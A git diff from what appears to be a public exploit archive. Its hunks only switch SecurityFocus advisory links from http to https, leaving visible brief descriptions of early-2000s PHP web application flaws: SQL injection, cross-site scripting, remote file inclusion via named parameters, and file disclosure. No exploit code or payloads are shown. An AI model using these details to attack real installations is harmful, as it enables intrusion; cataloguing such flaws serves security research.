@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5347/info +source: https://www.securityfocus.com/bid/5347/info dotproject is prone to an issue which may allow remote attackers to bypass authentication and gain administrative access to the software. diff --git a/exploits/php/webapps/21668.txt b/exploits/php/webapps/21668.txt index 90ba4b5c7..dba683dd0 100644 --- a/exploits/php/webapps/21668.txt +++ b/exploits/php/webapps/21668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5354/info +source: https://www.securityfocus.com/bid/5354/info shoutBOX does not sufficiently sanitize HTML tags from input supplied via form fields. Attackers may exploit this lack of input validation to inject arbitrary HTML and script code into pages that are generated by the script. This may result in execution of attacker-supplied code in the web client of a user who visits such a page. HTML and script code will be executed in the security context of the site hosting the software. diff --git a/exploits/php/webapps/21676.txt b/exploits/php/webapps/21676.txt index 6285ede02..65d32e123 100644 --- a/exploits/php/webapps/21676.txt +++ b/exploits/php/webapps/21676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5375/info +source: https://www.securityfocus.com/bid/5375/info Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter. diff --git a/exploits/php/webapps/21708.txt b/exploits/php/webapps/21708.txt index 2ce25ee0e..ea054c811 100644 --- a/exploits/php/webapps/21708.txt +++ b/exploits/php/webapps/21708.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5468/info +source: https://www.securityfocus.com/bid/5468/info Reportedly, L-Forum is vulnerable to SQL injection attacks. The vulnerability lies in the file 'search.php' diff --git a/exploits/php/webapps/21723.txt b/exploits/php/webapps/21723.txt index 37fd445f3..d85cae80c 100644 --- a/exploits/php/webapps/21723.txt +++ b/exploits/php/webapps/21723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5501/info +source: https://www.securityfocus.com/bid/5501/info Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files. diff --git a/exploits/php/webapps/21724.txt b/exploits/php/webapps/21724.txt index 2da79f407..b1c2c98af 100644 --- a/exploits/php/webapps/21724.txt +++ b/exploits/php/webapps/21724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5502/info +source: https://www.securityfocus.com/bid/5502/info Reportedly, it is possible for an administrator to manipulate (create, modify etc.) files outside of the FUDForum directories. This vulnerability is present in the 'adm/admbrowse.php' script. The vulnerability is the result of FUDForum allowing access to files and directories outside of FUDForum directories. diff --git a/exploits/php/webapps/21727.txt b/exploits/php/webapps/21727.txt index 763ff93ce..85a9d06d6 100644 --- a/exploits/php/webapps/21727.txt +++ b/exploits/php/webapps/21727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5504/info +source: https://www.securityfocus.com/bid/5504/info Mantis depends on include files to provide some functionality, such as dynamic generation of graphs. However, since Mantis does not properly validate the path to the include file, it is possible for attackers to specify an arbitrary path, either to a local file or a file on a remote server. diff --git a/exploits/php/webapps/21745.txt b/exploits/php/webapps/21745.txt index a1acbdc1d..00401733f 100644 --- a/exploits/php/webapps/21745.txt +++ b/exploits/php/webapps/21745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5552/info +source: https://www.securityfocus.com/bid/5552/info Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) which is used to store the location of the external files and specify an arbitrary location, such as an attacker-supplied PHP script on a remote host. diff --git a/exploits/php/webapps/21755.txt b/exploits/php/webapps/21755.txt index 75b0b313c..aff543d44 100644 --- a/exploits/php/webapps/21755.txt +++ b/exploits/php/webapps/21755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5569/info +source: https://www.securityfocus.com/bid/5569/info php(Reactor) does not sufficiently sanitize HTML from various fields (such as in the body of a message or in profile fields). It is possible to inject arbitrary HTML and script code into these fields. diff --git a/exploits/php/webapps/21776.txt b/exploits/php/webapps/21776.txt index 4a00eb52d..1a2ff88f1 100644 --- a/exploits/php/webapps/21776.txt +++ b/exploits/php/webapps/21776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5669/info +source: https://www.securityfocus.com/bid/5669/info PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems. diff --git a/exploits/php/webapps/21778.txt b/exploits/php/webapps/21778.txt index 6567424e6..78adea55b 100644 --- a/exploits/php/webapps/21778.txt +++ b/exploits/php/webapps/21778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5673/info +source: https://www.securityfocus.com/bid/5673/info phpGB is vulnerable to a SQL injection vulnerability. diff --git a/exploits/php/webapps/21779.txt b/exploits/php/webapps/21779.txt index 83d286e7c..4cc24fe01 100644 --- a/exploits/php/webapps/21779.txt +++ b/exploits/php/webapps/21779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5675/info +source: https://www.securityfocus.com/bid/5675/info WoltLab is prone to SQL injection attacks. This is due to insufficient sanitization of parameters handled by the board.php script, which may be supplied externally via the query string in a web request. diff --git a/exploits/php/webapps/21780.txt b/exploits/php/webapps/21780.txt index ed605ee21..bb1ee170b 100644 --- a/exploits/php/webapps/21780.txt +++ b/exploits/php/webapps/21780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5676/info +source: https://www.securityfocus.com/bid/5676/info phpGB is subject to HTML injection attacks. diff --git a/exploits/php/webapps/21783.txt b/exploits/php/webapps/21783.txt index 00bebe288..b53c92fb2 100644 --- a/exploits/php/webapps/21783.txt +++ b/exploits/php/webapps/21783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5679/info +source: https://www.securityfocus.com/bid/5679/info phpGB is subject to a PHP code injection vulnerability. diff --git a/exploits/php/webapps/21811.txt b/exploits/php/webapps/21811.txt index f44ab016b..b34e4a9ca 100644 --- a/exploits/php/webapps/21811.txt +++ b/exploits/php/webapps/21811.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5763/info +source: https://www.securityfocus.com/bid/5763/info SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. diff --git a/exploits/php/webapps/21817.txt b/exploits/php/webapps/21817.txt index 3d7f21292..0e0f6fd0a 100644 --- a/exploits/php/webapps/21817.txt +++ b/exploits/php/webapps/21817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5771/info +source: https://www.securityfocus.com/bid/5771/info Problems with JAWMail could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21825.txt b/exploits/php/webapps/21825.txt index f7309e000..5a15a0136 100644 --- a/exploits/php/webapps/21825.txt +++ b/exploits/php/webapps/21825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5779/info +source: https://www.securityfocus.com/bid/5779/info A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script. diff --git a/exploits/php/webapps/21829.txt b/exploits/php/webapps/21829.txt index bd7de9022..61f8eb680 100644 --- a/exploits/php/webapps/21829.txt +++ b/exploits/php/webapps/21829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5785/info +source: https://www.securityfocus.com/bid/5785/info Problems with XOOPS could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21855.txt b/exploits/php/webapps/21855.txt index 31c018933..f24eccbfd 100644 --- a/exploits/php/webapps/21855.txt +++ b/exploits/php/webapps/21855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5788/info +source: https://www.securityfocus.com/bid/5788/info PHPNuke 6.0 is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21859.txt b/exploits/php/webapps/21859.txt index d4a11ddc4..f7aa045d9 100644 --- a/exploits/php/webapps/21859.txt +++ b/exploits/php/webapps/21859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5796/info +source: https://www.securityfocus.com/bid/5796/info Problems with PHPNuke could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21860.txt b/exploits/php/webapps/21860.txt index 596aa51a2..bdd7229d7 100644 --- a/exploits/php/webapps/21860.txt +++ b/exploits/php/webapps/21860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5797/info +source: https://www.securityfocus.com/bid/5797/info Problems with NPDS could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21861.txt b/exploits/php/webapps/21861.txt index 58c9ed9a5..cd0b42e17 100644 --- a/exploits/php/webapps/21861.txt +++ b/exploits/php/webapps/21861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5798/info +source: https://www.securityfocus.com/bid/5798/info Problems with DaCode could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21862.txt b/exploits/php/webapps/21862.txt index a6aca91dc..a1d719155 100644 --- a/exploits/php/webapps/21862.txt +++ b/exploits/php/webapps/21862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5799/info +source: https://www.securityfocus.com/bid/5799/info A SQL injection vulnerability has been discovered in PHPNuke. diff --git a/exploits/php/webapps/21863.txt b/exploits/php/webapps/21863.txt index 93db4983a..9b9285006 100644 --- a/exploits/php/webapps/21863.txt +++ b/exploits/php/webapps/21863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5801/info +source: https://www.securityfocus.com/bid/5801/info Problems with Drupal could allow an attacker to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21864.txt b/exploits/php/webapps/21864.txt index fece63288..e2b043c63 100644 --- a/exploits/php/webapps/21864.txt +++ b/exploits/php/webapps/21864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5802/info +source: https://www.securityfocus.com/bid/5802/info Problems with phpWebSite could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21873.txt b/exploits/php/webapps/21873.txt index cca08d8f9..0a359b52e 100644 --- a/exploits/php/webapps/21873.txt +++ b/exploits/php/webapps/21873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5809/info +source: https://www.securityfocus.com/bid/5809/info A cross site scripting vulnerability has been reported for PostNuke. diff --git a/exploits/php/webapps/21874.txt b/exploits/php/webapps/21874.txt index 8d639f650..25017151c 100644 --- a/exploits/php/webapps/21874.txt +++ b/exploits/php/webapps/21874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5820/info +source: https://www.securityfocus.com/bid/5820/info A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. diff --git a/exploits/php/webapps/21886.txt b/exploits/php/webapps/21886.txt index 90eb41a3d..717a813ae 100644 --- a/exploits/php/webapps/21886.txt +++ b/exploits/php/webapps/21886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5849/info +source: https://www.securityfocus.com/bid/5849/info A vulnerability has been reported for Py-Membres 3.1 that allows remote attackers to obtain administrative privileges on vulnerable installations. diff --git a/exploits/php/webapps/21893.php b/exploits/php/webapps/21893.php index 0016e847a..8906f001b 100644 --- a/exploits/php/webapps/21893.php +++ b/exploits/php/webapps/21893.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5850/info +source: https://www.securityfocus.com/bid/5850/info TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted. diff --git a/exploits/php/webapps/21894.txt b/exploits/php/webapps/21894.txt index 1f7cdba60..8b633da6c 100644 --- a/exploits/php/webapps/21894.txt +++ b/exploits/php/webapps/21894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5851/info +source: https://www.securityfocus.com/bid/5851/info A problem with the default installation of Midicart PHP may make it possible for remote users to gain access to sensitive information. diff --git a/exploits/php/webapps/21896.txt b/exploits/php/webapps/21896.txt index 64a164f09..ac44e4270 100644 --- a/exploits/php/webapps/21896.txt +++ b/exploits/php/webapps/21896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5855/info +source: https://www.securityfocus.com/bid/5855/info A problem with the default installation of Midicart PHP may make it possible for remote users to gain access to sensitive information. diff --git a/exploits/php/webapps/21899.txt b/exploits/php/webapps/21899.txt index 324a98a0c..92222fe21 100644 --- a/exploits/php/webapps/21899.txt +++ b/exploits/php/webapps/21899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5864/info +source: https://www.securityfocus.com/bid/5864/info phpWebSite is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21900.txt b/exploits/php/webapps/21900.txt index dfbe41f92..f61f0ee29 100644 --- a/exploits/php/webapps/21900.txt +++ b/exploits/php/webapps/21900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5865/info +source: https://www.securityfocus.com/bid/5865/info MySimpleNews allows users to enter news articles through a web interface. It will allow PHP code to be injected into URI parameters of the 'users.php' script, which will be stored into a MySimpleNews file (news.php3). The injected code may then be executed by the attacker by requesting the 'news.php3' script. diff --git a/exploits/php/webapps/21901.txt b/exploits/php/webapps/21901.txt index 1e9fa061a..825a5e295 100644 --- a/exploits/php/webapps/21901.txt +++ b/exploits/php/webapps/21901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5866/info +source: https://www.securityfocus.com/bid/5866/info MySimpleNews stores the administrative password in clear text in a remotely viewable HTML file. diff --git a/exploits/php/webapps/21903.txt b/exploits/php/webapps/21903.txt index 2528ec7ff..47fb581a0 100644 --- a/exploits/php/webapps/21903.txt +++ b/exploits/php/webapps/21903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5882/info +source: https://www.securityfocus.com/bid/5882/info Books is a module written for PostNuke. Reportedly, Books is prone to cross site scripting attacks. diff --git a/exploits/php/webapps/21905.txt b/exploits/php/webapps/21905.txt index 93cccbb79..29324c252 100644 --- a/exploits/php/webapps/21905.txt +++ b/exploits/php/webapps/21905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5886/info +source: https://www.securityfocus.com/bid/5886/info A vulnerability has been discovered in phpMyNewsLetter. diff --git a/exploits/php/webapps/21906.txt b/exploits/php/webapps/21906.txt index d98a76fe4..3537549f5 100644 --- a/exploits/php/webapps/21906.txt +++ b/exploits/php/webapps/21906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5890/info +source: https://www.securityfocus.com/bid/5890/info Reportedly, phpLinkat is prone to cross site scripting attacks. diff --git a/exploits/php/webapps/21912.txt b/exploits/php/webapps/21912.txt index c1956f91e..2be4197a8 100644 --- a/exploits/php/webapps/21912.txt +++ b/exploits/php/webapps/21912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5905/info +source: https://www.securityfocus.com/bid/5905/info The Killer Protection PHP script is prone to an information-disclosure issue. Reportedly, unauthorized users can access sensitive user data by requesting the 'vars.inc' file in a malicious HTTP request. diff --git a/exploits/php/webapps/21918.html b/exploits/php/webapps/21918.html index c641296eb..c1f6df3c0 100644 --- a/exploits/php/webapps/21918.html +++ b/exploits/php/webapps/21918.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5919/info +source: https://www.securityfocus.com/bid/5919/info A SQL injection vulnerability has been discovered in VBZoom v1.01. diff --git a/exploits/php/webapps/21921.txt b/exploits/php/webapps/21921.txt index 303c23779..20c59e3f2 100644 --- a/exploits/php/webapps/21921.txt +++ b/exploits/php/webapps/21921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5926/info +source: https://www.securityfocus.com/bid/5926/info It has been reported that VBZoom 1.01 may allow attackers to upload arbitrary files to a vulnerable system. diff --git a/exploits/php/webapps/21930.txt b/exploits/php/webapps/21930.txt index 92cc77bdb..e5586d699 100644 --- a/exploits/php/webapps/21930.txt +++ b/exploits/php/webapps/21930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5939/info +source: https://www.securityfocus.com/bid/5939/info php(Reactor) is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21931.txt b/exploits/php/webapps/21931.txt index 917842d25..6ef136d66 100644 --- a/exploits/php/webapps/21931.txt +++ b/exploits/php/webapps/21931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5942/info +source: https://www.securityfocus.com/bid/5942/info phpBBmod ships with a sample script (phpinfo.php) that may disclosure sensitive information to remote attackers. When this script is accessed, sensitive information about the underlying environment will be revealed. diff --git a/exploits/php/webapps/21933.txt b/exploits/php/webapps/21933.txt index db335c64e..98c78c009 100644 --- a/exploits/php/webapps/21933.txt +++ b/exploits/php/webapps/21933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5945/info +source: https://www.securityfocus.com/bid/5945/info phpRank is a freely available web site link sharing script. It is available for Unix, Linux, and Microsoft operating systems. diff --git a/exploits/php/webapps/21950.txt b/exploits/php/webapps/21950.txt index dfcb7db86..b4cfd81a8 100644 --- a/exploits/php/webapps/21950.txt +++ b/exploits/php/webapps/21950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6004/info +source: https://www.securityfocus.com/bid/6004/info A cross-site scripting vulnerability has been reported in the YaBB (Yet Another Bulletin Board) forum login script. HTML tags or script code are not sanitized from the error output of erroneous login attempts. diff --git a/exploits/php/webapps/21956.txt b/exploits/php/webapps/21956.txt index 309d6db30..42fc2dc8b 100644 --- a/exploits/php/webapps/21956.txt +++ b/exploits/php/webapps/21956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6013/info +source: https://www.securityfocus.com/bid/6013/info kmMail does not sufficiently sanitize HTML and script code from the body of e-mail messages. As a result, an attacker may send a malicious message to a user of kmMail that includes arbitrary HTML and script code. diff --git a/exploits/php/webapps/21957.txt b/exploits/php/webapps/21957.txt index 0be0129dd..02359fd49 100644 --- a/exploits/php/webapps/21957.txt +++ b/exploits/php/webapps/21957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6018/info +source: https://www.securityfocus.com/bid/6018/info PHP Arena paFileDB is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21960.txt b/exploits/php/webapps/21960.txt index 413c30053..2869090b7 100644 --- a/exploits/php/webapps/21960.txt +++ b/exploits/php/webapps/21960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6033/info +source: https://www.securityfocus.com/bid/6033/info A vulnerability has been discovered in gBook v1.4. diff --git a/exploits/php/webapps/21961.txt b/exploits/php/webapps/21961.txt index 1462c84de..c34ae3650 100644 --- a/exploits/php/webapps/21961.txt +++ b/exploits/php/webapps/21961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6035/info +source: https://www.securityfocus.com/bid/6035/info MyMarket is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21967.txt b/exploits/php/webapps/21967.txt index 33a3ca17b..785e9abe2 100644 --- a/exploits/php/webapps/21967.txt +++ b/exploits/php/webapps/21967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21968.txt b/exploits/php/webapps/21968.txt index ed355b76d..030917d0e 100644 --- a/exploits/php/webapps/21968.txt +++ b/exploits/php/webapps/21968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21969.txt b/exploits/php/webapps/21969.txt index cf83e85de..90211edad 100644 --- a/exploits/php/webapps/21969.txt +++ b/exploits/php/webapps/21969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21970.txt b/exploits/php/webapps/21970.txt index 88c925ee0..e7dc5fc3f 100644 --- a/exploits/php/webapps/21970.txt +++ b/exploits/php/webapps/21970.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6057/info +source: https://www.securityfocus.com/bid/6057/info Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. diff --git a/exploits/php/webapps/21976.txt b/exploits/php/webapps/21976.txt index 3c011d13b..29f83dcde 100644 --- a/exploits/php/webapps/21976.txt +++ b/exploits/php/webapps/21976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6087/info +source: https://www.securityfocus.com/bid/6087/info Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter. diff --git a/exploits/php/webapps/21977.txt b/exploits/php/webapps/21977.txt index 58c730c79..af86085a9 100644 --- a/exploits/php/webapps/21977.txt +++ b/exploits/php/webapps/21977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6088/info +source: https://www.securityfocus.com/bid/6088/info A SQL injection vulnerability has been reported for PHP-Nuke 5.6. diff --git a/exploits/php/webapps/22009.txt b/exploits/php/webapps/22009.txt index c7370731f..5d7d326c2 100644 --- a/exploits/php/webapps/22009.txt +++ b/exploits/php/webapps/22009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6153/info +source: https://www.securityfocus.com/bid/6153/info An information disclosure vulnerability has been reported for httpbench. Reportedly, httpbench may disclose the contents of web server readable files to remote attackers. diff --git a/exploits/php/webapps/22017.txt b/exploits/php/webapps/22017.txt index 66b0994d6..fda13c058 100644 --- a/exploits/php/webapps/22017.txt +++ b/exploits/php/webapps/22017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6173/info +source: https://www.securityfocus.com/bid/6173/info The phpBB Advanced Quick Reply Hack is prone to an issue which may allow attackers to include arbitrary files from a remote server. diff --git a/exploits/php/webapps/22030.php b/exploits/php/webapps/22030.php index 92cc7cec3..3785c47e3 100644 --- a/exploits/php/webapps/22030.php +++ b/exploits/php/webapps/22030.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6226/info +source: https://www.securityfocus.com/bid/6226/info vBulletin does not filter HTML tags from URI parameters, making it prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/22037.txt b/exploits/php/webapps/22037.txt index 52f81d815..409e9fc5d 100644 --- a/exploits/php/webapps/22037.txt +++ b/exploits/php/webapps/22037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6244/info +source: https://www.securityfocus.com/bid/6244/info everal cross site scripting vulnerabilities have been reported for PHP-Nuke. diff --git a/exploits/php/webapps/22042.php b/exploits/php/webapps/22042.php index c74a31867..982ea628a 100644 --- a/exploits/php/webapps/22042.php +++ b/exploits/php/webapps/22042.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6246/info +source: https://www.securityfocus.com/bid/6246/info Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser. diff --git a/exploits/php/webapps/22043.txt b/exploits/php/webapps/22043.txt index 392a58789..88cfa0c1d 100644 --- a/exploits/php/webapps/22043.txt +++ b/exploits/php/webapps/22043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6248/info +source: https://www.securityfocus.com/bid/6248/info phpBB does not properly sanitize user input in forum postings. This could allow a malicious user to inject script code into a forum post which would in turn be executed when the page is viewed by other users. diff --git a/exploits/php/webapps/22044.txt b/exploits/php/webapps/22044.txt index 55b0ad7df..74c0e367e 100644 --- a/exploits/php/webapps/22044.txt +++ b/exploits/php/webapps/22044.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6251/info +source: https://www.securityfocus.com/bid/6251/info The Web Server Creator Web Portal is prone to an issue which may allow attackers to include arbitrary files from a remote server. diff --git a/exploits/php/webapps/22047.txt b/exploits/php/webapps/22047.txt index ae495b22f..ba53afd53 100644 --- a/exploits/php/webapps/22047.txt +++ b/exploits/php/webapps/22047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6258/info +source: https://www.securityfocus.com/bid/6258/info FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems. diff --git a/exploits/php/webapps/22048.txt b/exploits/php/webapps/22048.txt index 196573bad..6e6b19e3c 100644 --- a/exploits/php/webapps/22048.txt +++ b/exploits/php/webapps/22048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6260/info +source: https://www.securityfocus.com/bid/6260/info News Evolution is a freely available, open source news software package. It is written in PHP, and designed for use on Unix and Linux operating systems. diff --git a/exploits/php/webapps/22065.html b/exploits/php/webapps/22065.html index 6d9c82503..b9de26d8f 100644 --- a/exploits/php/webapps/22065.html +++ b/exploits/php/webapps/22065.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6311/info +source: https://www.securityfocus.com/bid/6311/info phpBB is vulnerable to cross site scripting attacks. This is due to insufficient santization of user-supplied input. The problem is located in the search.php script. This issue may be exploited by an attacker to steal a legitimate users cookie-based authentication credentials. diff --git a/exploits/php/webapps/22073.txt b/exploits/php/webapps/22073.txt index 76d8a727a..ed086d2b6 100644 --- a/exploits/php/webapps/22073.txt +++ b/exploits/php/webapps/22073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6330/info +source: https://www.securityfocus.com/bid/6330/info A vulnerability has been reported for APBoard that may allow unauthorized users to read postings in internal forums. The vulnerability is a result of the 'useraction.php' script failing to properly check user credentials. diff --git a/exploits/php/webapps/22075.txt b/exploits/php/webapps/22075.txt index 7bca35278..b4190ba7f 100644 --- a/exploits/php/webapps/22075.txt +++ b/exploits/php/webapps/22075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6334/info +source: https://www.securityfocus.com/bid/6334/info Ultimate PHP Board (UPB) is a freely available, open source PHP Bulletin Board. It is available for the Unix and Linux operating systems. diff --git a/exploits/php/webapps/22076.txt b/exploits/php/webapps/22076.txt index 49c6b7913..2bc8622f4 100644 --- a/exploits/php/webapps/22076.txt +++ b/exploits/php/webapps/22076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6335/info +source: https://www.securityfocus.com/bid/6335/info Ultimate PHP Board (UPB) is a freely available, open source PHP Bulletin Board. It is available for the Unix and Linux operating systems. diff --git a/exploits/php/webapps/22077.txt b/exploits/php/webapps/22077.txt index 29e9228d9..543f7d60a 100644 --- a/exploits/php/webapps/22077.txt +++ b/exploits/php/webapps/22077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6337/info +source: https://www.securityfocus.com/bid/6337/info Problems with vBulletin could make it possible for an attacker to inject arbitrary HTML in vBulletin forum messages. diff --git a/exploits/php/webapps/22080.txt b/exploits/php/webapps/22080.txt index ab666cc93..ef1cb5c5b 100644 --- a/exploits/php/webapps/22080.txt +++ b/exploits/php/webapps/22080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6344/info +source: https://www.securityfocus.com/bid/6344/info Xoops includes a Private Message System for users, so that they may send messages to one another. HTML tags used for font attributes are not sufficiently filtered of malicious HTML code. This makes it possible for an attacker to supply malicious input in the HTML font tags that contain arbitrary script code. When another user receives the attacker's private message, the malicious script code will be executed on that user in the context of the site running Xoops. diff --git a/exploits/php/webapps/22083.txt b/exploits/php/webapps/22083.txt index 82bd74760..f8fd963f4 100644 --- a/exploits/php/webapps/22083.txt +++ b/exploits/php/webapps/22083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6369/info +source: https://www.securityfocus.com/bid/6369/info A vulnerability has been discovered in VisNetic Website when generating a 404 page for a non-existent resources. The issue is due to insufficient sanitization of the HTTP 'referer' header. It is possible to cause arbitrary code to be executed within the context of the visited 404 page by embedding script code into the HTTP 'referer' header. diff --git a/exploits/php/webapps/22086.txt b/exploits/php/webapps/22086.txt index 50991d06d..1561b1a55 100644 --- a/exploits/php/webapps/22086.txt +++ b/exploits/php/webapps/22086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6376/info +source: https://www.securityfocus.com/bid/6376/info Mambo Site Server is a freely available, open source web content management tool. It is written in PHP, and available for Unix, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/22087.txt b/exploits/php/webapps/22087.txt index c980fedc2..cd51b11a9 100644 --- a/exploits/php/webapps/22087.txt +++ b/exploits/php/webapps/22087.txt 